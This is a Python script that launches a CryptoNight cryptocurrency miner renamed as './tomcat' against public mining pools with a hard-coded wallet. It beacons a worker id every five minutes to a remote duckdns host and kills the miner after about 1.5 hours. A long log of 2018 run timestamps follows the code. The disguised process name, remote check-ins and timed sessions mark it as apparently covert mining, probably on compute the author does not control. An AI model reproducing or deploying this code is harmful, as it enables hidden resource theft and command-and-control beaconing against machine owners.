import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:52:07.914689
#2018-02-17 16:39:01.631312
#2018-02-17 18:26:07.128220
#2018-02-17 20:16:07.171583
#2018-02-17 22:03:06.804421
#2018-02-17 23:47:03.695674
#2018-02-18 01:38:05.289364
#2018-02-18 03:25:04.318837
#2018-02-18 05:13:01.260339
#2018-02-18 07:05:07.334853
#2018-02-18 08:54:07.743112
#2018-02-18 10:41:06.725863
#2018-02-18 12:27:04.322091
#2018-02-18 14:14:06.947523
#2018-02-18 16:04:02.170079
#2018-02-18 17:53:03.932934
#2018-02-18 19:40:07.249170
#2018-02-18 21:25:01.451936
#2018-02-18 23:13:06.746576
#2018-02-19 00:59:04.793654
#2018-02-19 02:47:05.023807
#2018-02-19 04:33:01.892859
#2018-02-19 06:18:03.428308
#2018-02-19 08:06:07.922485
#2018-02-19 09:56:01.916937
#2018-02-19 11:46:04.653082
#2018-02-19 13:32:04.224286
#2018-02-19 15:22:07.070607
#2018-02-19 17:12:01.939514
#2018-02-19 18:59:07.088681
#2018-02-19 20:45:06.894749
#2018-02-19 22:33:05.279434
#2018-02-20 00:18:01.261174
#2018-02-20 02:06:06.861143
#2018-02-20 03:57:05.163994
#2018-02-20 05:42:06.218448
#2018-02-20 07:28:04.234921
#2018-02-20 09:13:07.843522
#2018-02-20 10:57:07.980467
#2018-02-20 12:47:05.781865
#2018-02-20 14:33:01.654891
#2018-02-20 16:16:07.631865
#2018-02-20 18:04:01.965810
#2018-02-20 19:55:09.437364
#2018-02-20 21:44:06.547173
#2018-02-20 23:26:01.662275
#2018-02-21 01:10:05.635327
#2018-02-21 02:56:04.074186
#2018-02-21 04:44:05.480509
#2018-02-21 06:32:03.650012
#2018-02-21 08:17:04.683519
#2018-02-21 10:03:07.979454
#2018-02-21 11:51:01.860228
#2018-02-21 13:42:07.473680
#2018-02-21 15:25:07.999322
#2018-02-21 17:15:13.231135
#2018-02-21 19:02:01.296785
#2018-02-21 20:49:04.802592
#2018-02-21 22:33:05.350083
#2018-02-22 00:24:01.772910
#2018-02-22 02:12:06.627957
#2018-02-22 03:59:08.256529
#2018-02-22 05:46:06.135942
#2018-02-22 07:31:07.062907
#2018-02-22 09:18:07.245149
#2018-02-22 11:05:05.758949
#2018-02-22 12:51:02.202788
#2018-02-22 14:38:08.768518
#2018-02-22 16:24:11.001479
#2018-02-22 18:12:10.362769
#2018-02-22 20:03:03.830595
#2018-02-22 21:51:07.441773
#2018-02-22 23:39:06.305388
#2018-02-23 01:26:08.306250
#2018-02-23 03:12:06.986220
#2018-02-23 05:00:10.336928
#2018-02-23 06:45:04.343388
#2018-02-23 08:36:02.216488
#2018-02-23 10:51:01.762320
#2018-02-23 12:49:06.884502
#2018-02-23 14:34:05.330634
#2018-02-23 16:25:04.016288
#2018-02-23 18:11:09.419666
#2018-02-23 19:57:07.264248
#2018-02-23 21:40:06.871844
#2018-02-23 23:33:04.085728
#2018-02-24 01:22:03.801725
#2018-02-24 03:12:07.034630
#2018-02-24 04:57:07.591767
#2018-02-24 06:46:06.433869
#2018-02-24 08:37:06.144249
#2018-02-24 10:22:06.075134
#2018-02-24 12:17:05.392207
#2018-02-24 14:10:01.613227
#2018-02-24 15:56:07.872863
#2018-02-24 17:48:04.133268
#2018-02-24 19:36:07.878203
#2018-02-24 21:23:07.432380
#2018-02-25 00:04:05.633794
#2018-02-25 04:21:05.699677
#2018-02-25 07:52:05.908407